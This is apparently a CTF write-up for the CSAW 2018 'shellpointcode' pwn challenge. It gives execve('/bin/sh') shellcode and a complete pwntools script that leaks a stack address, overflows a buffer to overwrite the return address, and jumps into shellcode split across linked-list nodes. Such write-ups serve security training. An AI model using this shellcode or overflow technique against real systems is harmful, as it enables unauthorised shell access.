Tags: shell
Rating:
**Description**
> Linked lists are great! They let you chain pieces of data together.
>
> `nc pwn.chal.csaw.io 9005`
**Files provided**
- [`shellpointcode`](https://github.com/Aurel300/empirectf/blob/master/writeups/2018-09-14-CSAW-CTF-Quals/files/shellpointcode)
**Solution** (by [Mem2019](https://github.com/Mem2019))
put `/bin/sh\x00` into node 1, and put shellcode
```assembly
add esp,0x30
xor rdx,rdx
xor rsi,rsi
push SYS_execve
pop rax
syscall
```
```python
from pwn import *
g_local=True
context.log_level='debug'
if g_local:
sh = process('./shellpointcode')#env={'LD_PRELOAD':'./libc.so.6'}
gdb.attach(sh)
else:
sh = remote("pwn.chal.csaw.io", 9005)
shellcode = "lea rdi,[rsp+0x28]\nxor rdx,rdx\nxor rsi,rsi"
sh.recvuntil("(15 bytes) Text for node 1: \n")
sh.send("/bin/sh\x00\n")
sh.recvuntil("(15 bytes) Text for node 2: \n")
sh.send("A" * 5 + asm("\npush SYS_execve\npop rax\nsyscall", arch='amd64') + "\n")
sh.recvuntil("node.next: 0x")
leak = sh.recv(6*2)
ret_addr = int(leak, 16)
sh.recvuntil("What are your initials?\n")
sh.send("A" * (3+8) + p64(ret_addr) + asm(shellcode, arch='amd64') + "\xeb\n")
sh.interactive()
```
to node 2 and initials
bacause the memory layout, is initials, node 2, node 1, from low address to high address
